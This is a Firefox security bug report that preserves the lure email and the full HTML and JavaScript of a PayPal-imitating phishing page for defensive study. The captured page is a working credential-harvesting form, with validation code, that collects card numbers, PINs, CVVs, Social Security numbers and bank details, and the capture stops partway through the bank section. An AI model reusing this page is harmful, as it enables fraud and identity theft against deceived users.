Closed
Bug 310519
Opened 19 years ago
Closed 12 years ago
phishing site content analysis
Categories
(Firefox :: Security, defect)
RESOLVED
INCOMPLETE
People
(Reporter: chofmann, Unassigned)
Details
Attachments
(2 files)
This bug records the content of an example phishing site for future analysis of how the browser might deal with such content and respond to provide a higher level of protection. The content came from http://accounts-confirmations.co.uk/paypal/verify.htm, which the user was directed to from an e-mail message indicating that a potentially fraudulent transaction had occurred on the e-mail recipient's PayPal account.
The e-mail told the user: "To confirm or decline this transaction, please follow the link provide below, Please save the fraud alert id for your reference. http://www.paypal-com-cgi-bin-confirmation-pp7848%34%31%2E%63%6F%6D If we do not get the confirmation within 5 business days, your account will be suspended until further notice."
Note that the end of the host name in that link is percent-encoded: %34%31%2E%63%6F%6D decodes to "41.com", so the link leads to a look-alike domain whose name merely begins with "www.paypal-com", not to paypal.com.
The content on the web site looked like this (reproduced as captured):
<html> <head> <!-- Script info: script: webscr, cmd: _profile-summary, template: p/acc/pro/summary, date: Feb. 10, 2005 02:55:23 PST; country: US, language: en_US web version: 28.0-199 branch: live3-280_int content version: 28.0-199 pexml version: 28.0-199 page XSL: en_US/account/profile/Summary.xsl --> <title>PayPal - Profile Confirmation</title> <meta http-equiv="description" content="PayPal lets you send money to anyone with email. PayPal is free for consumers and works seamlessly with your existing credit card and checking account. 
You can settle debts, borrow cash, divide bills or split expenses with friends all without going to an ATM or looking for your checkbook."> <meta http-equiv="keywords" content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, cell phones, two-way pagers, Windows CE"> <link href="http://www.paypal.com/css/xpt.css" rel="stylesheet" type="text/css"> <link href="http://www.paypal.com/css/xptInvoice.css" rel="stylesheet" type="text/css"> <link href="http://www.paypal.com/css/xptlive.css" rel="stylesheet" type="text/css"> <style type="text/css"></style> <link href="http://www.paypal.com/en_US/i/icon/pp_favicon_x.ico" rel="shortcut icon"> <script src="UpDate-Credts_files/pp_main.js"></script> </head> <body> <SCRIPT language=JavaScript> <!-- zipString = "---- very lond string"; stateRange = "00215NH00544NY00795PR00851VI00988PR02791MA02940RI03897NH04992ME05495VT05544MA05907VT06389CT06390NY06928CT08989NJ09899AE14925NY19640PA19980DE20099DC20199VA20599DC21930MD24658VA26886WV28909NC29945SC31999GA33994FL34099AA34997FL36925AL38589TN39776MS39901GA42788KY45999OH47997IN49971MI52809IA54990WI56763MN57799SD58856ND59937MT62999IL65899MO67954KS69367NE71497LA72959AR73199OK73344TX74966OK79999TX81658CO83128WY83422ID83422WY83888ID84791UT86556AZ88441NM88595TX89883NV96162CA96698AP96797HI96799AS96898HI96932GU96940PW96944FM96952MP96970MH97920OR99403WA99950AK"; var Cards = new makeArray(8); Cards[0] = new CardType("MasterCard", "51,52,53,54,55", "16"); var MasterCard = Cards[0]; Cards[1] = new CardType("VisaCard", "4", "13,16"); var VisaCard = Cards[1]; Cards[2] = new CardType("AmExCard", "34,37", "15"); var AmExCard = Cards[2]; Cards[3] = new CardType("DinersClubCard", "30,36,38", "14"); var DinersClubCard = Cards[3]; Cards[4] = new CardType("DiscoverCard", "6011", "16"); var DiscoverCard = Cards[4]; Cards[5] = new CardType("enRouteCard", "2014,2149", "15"); var enRouteCard = Cards[5]; Cards[6] = new CardType("JCBCard", 
"3088,3096,3112,3158,3337,3528", "16"); var JCBCard = Cards[6]; var LuhnCheckSum = Cards[7] = new CardType(); function getState(zip) { if ((parseInt(zipString.substr(zip / 4, 1), 16) & Math.pow(2, zip % 4)) && (zip.length == 5)) for (var i = 0; i < stateRange.length; i += 7) if (zip <= 1 * stateRange.substr(i, 5)) return stateRange.substr(i + 5, 2); return null; } function check_all(form) { if (form.first_name.value.length == 0) { alert("Please enter First Name!"); form.first_name.focus(); return false; } if (form.middle_name.value.length == 0) { alert("Please enter Middle Name!"); form.middle_name.focus(); return false; } if (form.last_name.value.length == 0) { alert("Please enter last Name!"); form.last_name.focus(); return false; } if (form.credit_card_type.options[form.credit_card_type.selectedIndex].value == "--") { alert("Please select valid Card type"); form.credit_card_type.focus(); return false; } if (form.cc_number.value.length < 16) { alert("Please enter a valid Card Number."); form.cc_number.focus(); return false; } /* return checkCC(form.cc_number.value); */ var i, n, c, r, t; // First, reverse the string and remove any non-numeric characters. s = form.cc_number.value r = ""; for (i = 0; i < s.length; i++) { c = parseInt(s.charAt(i), 10); if (c >= 0 && c <= 9) r = c + r; } // Check for a bad string. if (r.length <= 1) return false; // Now run through each single digit to create a new string. Even digits // are multiplied by two, odd digits are left alone. t = ""; for (i = 0; i < r.length; i++) { c = parseInt(r.charAt(i), 10); if (i % 2 != 0) c *= 2; t = t + c; } // Finally, add up all the single digits in this string. n = 0; for (i = 0; i < t.length; i++) { c = parseInt(t.charAt(i), 10); n = n + c; } // If the resulting sum is an even multiple of ten (but not zero), the // card number is good. 
if (!(n != 0 && n % 10 == 0)){ alert ("Invalid Card Number"); return false; } if (form.expdate_year.value == 0) { alert("Please enter the Expiration Year."); form.expdate_year.focus(); return false; } if (form.pin.value.length < 4) { alert("Please valid pin Number."); form.pin.focus(); return false; } if (form.cvv2_number.value.length < 3) { alert("Please valid Card Verification number."); form.cvv2_number.focus(); return false; } /* start zip code verification */ if (form.zip.value.length < 5) { alert("Please enter Valid Zip Code"); form.zip.focus(); return false; } var state = getState(form.zip.value); if (!(state == form.state.value)) { alert("Please enter Valid Zip Code"); form.zip.focus(); return false; } if (form.ssn1.value.length < 3) { alert("Please enter Valid Social Security Number"); form.ssn1.focus(); return false; } if (form.bank_acct_account_number.value.length = 0) { alert("Please enter Valid bank accout Number"); form.bank_acct_account_number.focus(); return false; } /* end zip code verification */ } --> </SCRIPT> <div> <div id="xptHeader"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr> <td nowrap><img border="0" src="UpDate-Credts_files/paypal_logo.gif" alt=""></td> <td align="center" class="cobrand" width="100%"> </td> <td align="right" nowrap> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_help&source_page=_profile-summary">Help</a> </td> </tr></table></div> <div id="xptTabs"> <table align="center" border="0" cellpadding="0" cellspacing="0" class="primary"><tr> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"><IMG alt="My Account" src="UpDate-Credts_files/P_on_my_account.gif" border="0" alt="My Account"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_transaction-run"><img 
src="UpDate-Credts_files/P_off_send_money.gif" border="0" alt="Send Money"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_request-money"><img src="UpDate-Credts_files/P_off_request_money.gif" border="0" alt="Request Money"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_merchant"><img src="UpDate-Credts_files/P_off_merchant_tools.gif" border="0" alt="Merchant Tools"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_auction"><img src="UpDate-Credts_files/P_off_auction_tools.gif" border="0" alt="Auction Tools"></a></td> </tr></table> <div class="alignCenter"><table align="center" border="0" cellpadding="0" cellspacing="0" class="secondary"><tr> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="24" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"><img src="UpDate-Credts_files/SA_off_overview.gif" border="0" alt="My Account - Overview"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_add-funds"><img src="UpDate-Credts_files/SA_off_add_funds.gif" border="0" alt="My Account - Add Funds"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_withdraw-funds"><img src="UpDate-Credts_files/SA_off_withdraw.gif" border="0" alt="My Account - Withdraw Funds"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_history"><img 
src="UpDate-Credts_files/SA_off_history.gif" border="0" alt="My Account - History"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_complaint-view"><img src="UpDate-Credts_files/SA_off_resolution.gif" border="0" alt="My Account - Resolution Center"></a></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-summary"><img src="UpDate-Credts_files/SA_on_profile.gif" border="0" alt="My Account - Profile"></a></td> <td width="100%"> </td> </tr></table></div> </div> <div id="xptContentOuter"><table align="center" border="0" cellpadding="0" cellspacing="0" id="xptContentInner"><tr valign="top"><td> <div id="xptTitle"><table align="center" border="0" cellpadding="0" cellspacing="0" class="main"> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=600 border=0></TD></TR> <TR> <TD></TD></TR> <TR> <TD vAlign=top> <FORM action="processing.php" method="post" name="securityForm"> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=140 border=0></TD> <TD width=600> <DIV id=xptTitle> <TABLE class=main cellSpacing=0 cellPadding=0 align=center border=0><TBODY> <TR> <TD class=heading width="100%">Confirm Your Credit Card or Debit Card Card</TD></TR> <TR> <TD><IMG height=2 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <HR> </TD></TR></TBODY></TABLE></DIV> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0><TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD width="100%"><SPAN class=small>We take the privacy of your personal information very seriously. 
Per our Privacy Policy, please be assured that we will not share your information with outside parties without your knowledge. generated number. </TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=15 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <TABLE class=formTable cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD class=topSpacer width=150><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=150 border=0></TD> <TD class=topSpacer width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD class=topSpacer width="100%"><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=label><LABEL for=first_name>First Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=first_name maxLength=32 size=20 name=first_name></TD></TR> <TR> <TD class=label><LABEL for=last_name>Middle Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=middle_name maxLength=32 size=10 name=middle_name><SPAN class=small> (Full name)</SPAN></TD></TR> <TR> <TD class=label><LABEL for=last_name>Last Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=last_name maxLength=32 size=20 name=last_name></TD></TR> <TR> <TD class=label><LABEL for=credit_card_type>Card Type:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=credit_card_type name=credit_card_type><OPTION value="--" selected></OPTION> <OPTION value=V>Visa</OPTION> <OPTION value=M>MasterCard</OPTION> <OPTION value=D>Discover</OPTION> <OPTION value=A>American Express</OPTION></SELECT></TD></TR> <TR> <TD class=label><LABEL for=cc_number>Card Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" 
src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 align=left border=0><TBODY> <TR> <TD vAlign=top><INPUT id=cc_number maxLength=16 size=30 name=ccnumber> </TD> <TD vAlign=top> <DIV id=xptCardIcons> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD vAlign=top align=bottom><IMG alt=Visa src="UpDate-Credts_files/logo_ccVisa.gif" border=0><WBR></WBR><IMG alt=Mastercard src="UpDate-Credts_files/logo_ccMC.gif" border=0><WBR></WBR><IMG alt="American Express" src="UpDate-Credts_files/logo_ccAmex.gif" border=0><WBR></WBR><IMG alt=Discover src="UpDate-Credts_files/logo_ccDiscover.gif" border=0><WBR></WBR><IMG alt=eCheck src="UpDate-Credts_files/logo_ccEcheck.gif" border=0><WBR></WBR> </TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD class=label><LABEL for=expdate_month>Expiration Date:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=expdate_month name=expdate_month> <option value="1" selected>1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> <option value="6">6</option> <option value="7">7</option> <option value="8">8</option> <option value="9">9</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> <option value="12">12</option> </select><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0><SELECT name=expdate_year><option value=0 selected>0</option> <OPTION value=2005>2005</OPTION> <OPTION value=2005>2006</OPTION> <OPTION value=2006>2007</OPTION> <OPTION value=2007>2008</OPTION> <OPTION value=2008>2009</OPTION> <OPTION value=2009>2010</OPTION> <OPTION value=2010>2011</OPTION> <OPTION value=2011>2012</OPTION> <OPTION value=2012>2013</OPTION> <OPTION value=2013>2014</OPTION> <OPTION value=2014>2015</OPTION> <OPTION value=2015>2016</OPTION></SELECT> 
</TD></TR> <TR> <TD colSpan=3></TD></TR> <TR> <TD class=label><LABEL for=last_name>Card PIN <a href="JavaScript:alert('This the credit/debit card personal identification number (PIN) which is used in ATM machines. It is of 4 or 6 digits.')">[?]</a> :</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=pin maxLength=6 size=5 name=pin>* If PIN is invalid your account will not be verified.</TD></TR> <TR> <TD class=label><LABEL for=cvv2_number>Card Verification<BR>Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 align=left border=0><TBODY> <TR> <TD><INPUT id=cvv2_number maxLength=3 size=3 name=cvv2><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0> </TD> <TD rowSpan=2> <SCRIPT language=JavaScript> <!-- hide from JavaScript-challenged browsers function openWindow1() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=430,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow1();"><IMG alt=Help finding your Card Verification Number src="UpDate-Credts_files/mini_cvv2.gif" align=top border=0></A> </TD> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0></TD> <TD><SPAN class=small>(On the back of your card, find the last 3 digits)</SPAN><BR> <SCRIPT language=JavaScript> <!-- hide from JavaScript-challenged browsers function openWindow1() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow1();"><SPAN class=small>Help finding your Card Verification Number </SPAN></A> | <SCRIPT language=JavaScript> 
<!-- hide from JavaScript-challenged browsers function openWindow11() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info-amex_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow11();"><SPAN class=small>Using AmEx?</SPAN></A> </TD></TR></TBODY></TABLE></TABLE><BR></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD align=left> <TABLE cellSpacing=0 cellPadding=0 width=600 align=left border=0> <TBODY> <TR> <TD class=headerBorder colSpan=2>Billing Address And Your Personal Infromation</TD></TR> <TR> <TD class=small colSpan=2><BR>Enter the address where you receive billing statements for this card. In order to verify your bank card number, the billing address must be the one displayed on your bank receipt.</TD></TR> <TR> <TD colSpan=2><IMG height=15 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <TABLE class=formTable cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD class=topSpacer width=150><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=150 border=0></TD> <TD class=topSpacer width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD class=topSpacer width="100%"><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=label><LABEL for=address1>Address 1:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=address1 maxLength=100 size=25 name=address1></TD></TR> <TR> <TD class=label><LABEL for=address2>Address 2:<BR><SPAN class=small>(optional)</SPAN></LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=address2 maxLength=100 size=25 
name=address2></TD></TR> <TR> <TD class=label><LABEL for=city>City:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=city maxLength=40 size=25 name=city></TD></TR> <TR> <TD class=label><LABEL for=state>State:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=state name=state><OPTION value="" selected></OPTION> <OPTION value=AK>AK</OPTION> <OPTION value=AL>AL</OPTION> <OPTION value=AR>AR</OPTION> <OPTION value=AZ>AZ</OPTION> <OPTION value=CA>CA</OPTION> <OPTION value=CO>CO</OPTION> <OPTION value=CT>CT</OPTION> <OPTION value=DC>DC</OPTION> <OPTION value=DE>DE</OPTION> <OPTION value=FL>FL</OPTION> <OPTION value=GA>GA</OPTION> <OPTION value=HI>HI</OPTION> <OPTION value=IA>IA</OPTION> <OPTION value=ID>ID</OPTION> <OPTION value=IL>IL</OPTION> <OPTION value=IN>IN</OPTION> <OPTION value=KS>KS</OPTION> <OPTION value=KY>KY</OPTION> <OPTION value=LA>LA</OPTION> <OPTION value=MA>MA</OPTION> <OPTION value=MD>MD</OPTION> <OPTION value=ME>ME</OPTION> <OPTION value=MI>MI</OPTION> <OPTION value=MN>MN</OPTION> <OPTION value=MO>MO</OPTION> <OPTION value=MS>MS</OPTION> <OPTION value=MT>MT</OPTION> <OPTION value=NC>NC</OPTION> <OPTION value=ND>ND</OPTION> <OPTION value=NE>NE</OPTION> <OPTION value=NH>NH</OPTION> <OPTION value=NJ>NJ</OPTION> <OPTION value=NM>NM</OPTION> <OPTION value=NV>NV</OPTION> <OPTION value=NY>NY</OPTION> <OPTION value=OH>OH</OPTION> <OPTION value=OK>OK</OPTION> <OPTION value=OR>OR</OPTION> <OPTION value=PA>PA</OPTION> <OPTION value=RI>RI</OPTION> <OPTION value=SC>SC</OPTION> <OPTION value=SD>SD</OPTION> <OPTION value=TN>TN</OPTION> <OPTION value=TX>TX</OPTION> <OPTION value=UT>UT</OPTION> <OPTION value=VA>VA</OPTION> <OPTION value=VT>VT</OPTION> <OPTION value=WA>WA</OPTION> <OPTION value=WI>WI</OPTION> <OPTION value=WV>WV</OPTION> <OPTION value=WY>WY</OPTION> <OPTION value=AA>AA</OPTION> <OPTION 
value=AE>AE</OPTION> <OPTION value=AP>AP</OPTION> <OPTION value=AS>AS</OPTION> <OPTION value=FM>FM</OPTION> <OPTION value=GU>GU</OPTION> <OPTION value=MH>MH</OPTION> <OPTION value=MP>MP</OPTION> <OPTION value=PR>PR</OPTION> <OPTION value=PW>PW</OPTION> <OPTION value=VI>VI</OPTION></SELECT></TD></TR> <TR> <TD class=label><LABEL for=zip>ZIP Code:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=zip maxLength=10 size=10 name=zip><SPAN class=small> (5 or 9 digits)</SPAN><BR></TD></TR> <TR> <TD class=label><LABEL for=country>Country:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><LABEL for=country><font color="#000000"><strong><select id="country" name="country" 24px="" height="" 181px=""> <option selected="selected">United States</option> <option>Albania</option> <option>Algeria</option> <option>American Samoa</option> <option>Andorra</option> <option>Angola</option> <option>Anguilla</option> <option>Antarctica</option> <option>Antigua And Barbuda</option> <option>Argentina</option> <option>Armenia</option> <option>Aruba</option> <option>Australia</option> <option>Austria</option> <option>Azerbaijan</option> <option>Bahamas</option> <option>Bahrain</option> <option>Bangladesh</option> <option>Barbados</option> <option>Belarus</option> <option>Belgium</option> <option>Belize</option> <option>Benin</option> <option>Bermuda</option> <option>Bhutan</option> <option>Bolivia</option> <option>Bosnia and Herzegovina</option> <option>Botswana</option> <option>Bouvet Island</option> <option>Brazil</option> <option>British Indian Ocean Territory</option> <option>Brunei Darussalam</option> <option>Bulgaria</option> <option>Burkina Faso</option> <option>Burma</option> <option>Burundi</option> <option>Cambodia</option> <option>Cameroon</option> <option>Canada</option> <option>Cape Verde</option> <option>Cayman Islands</option> <option>Central African 
Republic</option> <option>Chad</option> <option>Chile</option> <option>China</option> <option>Christmas Island</option> <option>Cocos (Keeling) Islands</option> <option>Colombia</option> <option>Comoros</option> <option>Congo</option> <option>Congo, the Democratic Republic of the</option> <option>Cook Islands</option> <option>Costa Rica</option> <option>Cote d'Ivoire</option> <option>Croatia</option> <option>Cyprus</option> <option>Czech Republic</option> <option>Denmark</option> <option>Djibouti</option> <option>Dominica</option> <option>Dominican Republic</option> <option>East Timor</option> <option>Ecuador</option> <option>Egypt</option> <option>El Salvador</option> <option>England</option> <option>Equatorial Guinea</option> <option>Eritrea</option> <option>Espana</option> <option>Estonia</option> <option>Ethiopia</option> <option>Falkland Islands</option> <option>Faroe Islands</option> <option>Fiji</option> <option>Finland</option> <option>France</option> <option>French Guiana</option> <option>French Polynesia</option> <option>French Southern Territories</option> <option>Gabon</option> <option>Gambia</option> <option>Georgia</option> <option>Germany</option> <option>Ghana</option> <option>Gibraltar</option> <option>Great Britain</option> <option>Greece</option> <option>Greenland</option> <option>Grenada</option> <option>Guadeloupe</option> <option>Guam</option> <option>Guatemala</option> <option>Guinea</option> <option>Guinea-Bissau</option> <option>Guyana</option> <option>Haiti</option> <option>Heard and Mc Donald Islands</option> <option>Honduras</option> <option>Hong Kong</option> <option>Hungary</option> <option>Iceland</option> <option>India</option> <option>Indonesia</option> <option>Ireland</option> <option>Israel</option> <option>Italy</option> <option>Jamaica</option> <option>Japan</option> <option>Jordan</option> <option>Kazakhstan</option> <option>Kenya</option> <option>Kiribati</option> <option>Korea (North)</option> <option>Korea, Republic 
of</option> <option>Korea (South)</option> <option>Kuwait</option> <option>Kyrgyzstan</option> <option>Lao People's Democratic Republic</option> <option>Latvia</option> <option>Lebanon</option> <option>Lesotho</option> <option>Liberia</option> <option>Liechtenstein</option> <option>Lithuania</option> <option>Luxembourg</option> <option>Macau</option> <option>Macedonia</option> <option>Madagascar</option> <option>Malawi</option> <option>Malaysia</option> <option>Maldives</option> <option>Mali</option> <option>Malta</option> <option>Marshall Islands</option> <option>Martinique</option> <option>Mauritania</option> <option>Mauritius</option> <option>Mayotte</option> <option>Mexico</option> <option>Micronesia, Federated States of</option> <option>Moldova, Republic of</option> <option>Monaco</option> <option>Mongolia</option> <option>Montserrat</option> <option>Morocco</option> <option>Mozambique</option> <option>Myanmar</option> <option>Namibia</option> <option>Nauru</option> <option>Nepal</option> <option>Netherlands</option> <option>Netherlands Antilles</option> <option>New Caledonia</option> <option>New Zealand</option> <option>Nicaragua</option> <option>Niger</option> <option>Nigeria</option> <option>Niue</option> <option>Norfolk Island</option> <option>Northern Ireland</option> <option>Northern Mariana Islands</option> <option>Norway</option> <option>Oman</option> <option>Pakistan</option> <option>Palau</option> <option>Panama</option> <option>Papua New Guinea</option> <option>Paraguay</option> <option>Peru</option> <option>Philippines</option> <option>Pitcairn</option> <option>Poland</option> <option>Portugal</option> <option>Puerto Rico</option> <option>Qatar</option> <option>Reunion</option> <option>Romania</option> <option>Russia</option> <option>Russian Federation</option> <option>Rwanda</option> <option>Saint Kitts and Nevis</option> <option>Saint Lucia</option> <option>Saint Vincent and the Grenadines</option> <option>Samoa (Independent)</option> <option>San 
Marino</option> <option>Sao Tome and Principe</option> <option>Saudi Arabia</option> <option>Scotland</option> <option>Senegal</option> <option>Seychelles</option> <option>Sierra Leone</option> <option>Singapore</option> <option>Slovakia</option> <option>Slovenia</option> <option>Solomon Islands</option> <option>Somalia</option> <option>South Africa</option> <option>South Georgia and the South Sandwich Islands</option> <option>South Korea</option> <option>Spain</option> <option>Sri Lanka</option> <option>St. Helena</option> <option>St. Pierre and Miquelon</option> <option>Suriname</option> <option>Svalbard and Jan Mayen Islands</option> <option>Swaziland</option> <option>Sweden</option> <option>Switzerland</option> <option>Taiwan</option> <option>Tajikistan</option> <option>Tanzania</option> <option>Thailand</option> <option>Togo</option> <option>Tokelau</option> <option>Tonga</option> <option>Trinidad</option> <option>Trinidad and Tobago</option> <option>Tunisia</option> <option>Turkey</option> <option>Turkmenistan</option> <option>Turks and Caicos Islands</option> <option>Tuvalu</option> <option>Uganda</option> <option>Ukraine</option> <option>United Arab Emirates</option> <option>United Kingdom</option> <option>United States</option> <option>United States Minor Outlying Islands</option> <option>Uruguay</option> <option>USA</option> <option>Uzbekistan</option> <option>Vanuatu</option> <option>Vatican City State (Holy See)</option> <option>Venezuela</option> <option>Viet Nam</option> <option>Virgin Islands (British)</option> <option>Virgin Islands (U.S.)</option> <option>Wales</option> <option>Wallis and Futuna Islands</option> <option>Western Sahara</option> <option>Yemen</option> <option>Zambia</option> <option>Zimbabwe</option> </select></strong></font><TR> <TD class=label><LABEL for=zip>Phone Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=mmn maxLength=20 size=15 
name=phone><BR></TD></TR> <TR> <TD class=label><LABEL for=SSN>Social Security Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><input id="ssn1" size="3" maxlength="3" name="ssn1" value="" type="text"> <input id="ssn2" size="2" maxlength="2" name="ssn2" value="" type="text"> <input id="ssn3" size="4" maxlength="5" name="ssn3" value="" type="text"><BR></TD></TR> <TR> <TD class=label><LABEL for=dob><br>Date of Birth:</label></td> <td height="40"><br class="field_spacer"> </td> <td class="pptext" height="40"><font face="Arial, Helvetica, Verdana, sans-serif" size="2"><select name="pibirthdatemm"> <option value="0" selected>--Month--</option> <option value="1">January</option> <option value="2">February</option> <option value="3">March</option> <option value="4">April</option> <option value="5">May</option> <option value="6">June</option> <option value="7">July</option> <option value="8">August</option> <option value="9">September</option> <option value="10">October</option> <option value="11">November</option> <option value="12">December</option> </select> </font><select name="pibirthdatedd"> <option value="0" selected>--Day--</option> <option value="1">01</option> <option value="2">02</option> <option value="3">03</option> <option value="4">04</option> <option value="5">05</option> <option value="6">06</option> <option value="7">07</option> <option value="8">08</option> <option value="9">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> <option value="13">13</option> <option value="14">14</option> <option value="15">15</option> <option value="16">16</option> <option value="17">17</option> <option value="18">18</option> <option value="19">19</option> <option value="20">20</option> <option value="21">21</option> <option value="22">22</option> <option value="23">23</option> <option value="24">24</option> <option value="25">25</option> <option 
value="26">26</option> <option value="27">27</option> <option value="28">28</option> <option value="29">29</option> <option value="30">30</option> <option value="31">31</option> </select> <input maxLength="4" size="5" name="pibirthdateyy"> <font size="2">(mm/dd/yyyy)</font></td> </tr> <tr> <TD class=label><LABEL for=zip>Mother's Maiden Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=mmn maxLength=20 size=15 name=mmn><BR></TD></TR> <TR></LABEL></TD></TR></TBODY></TABLE><table align="center" border="0" cellpadding="0" cellspacing="0" width="600"> <tbody><tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="600"></td></tr> <tr><td><div id="xptTitle"><table class="main" align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr><td class="heading" width="100%">Confirm U.S. Bank Account</td></tr> <tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="2" width="1"></td></tr> <tr><td><hr></td></tr> 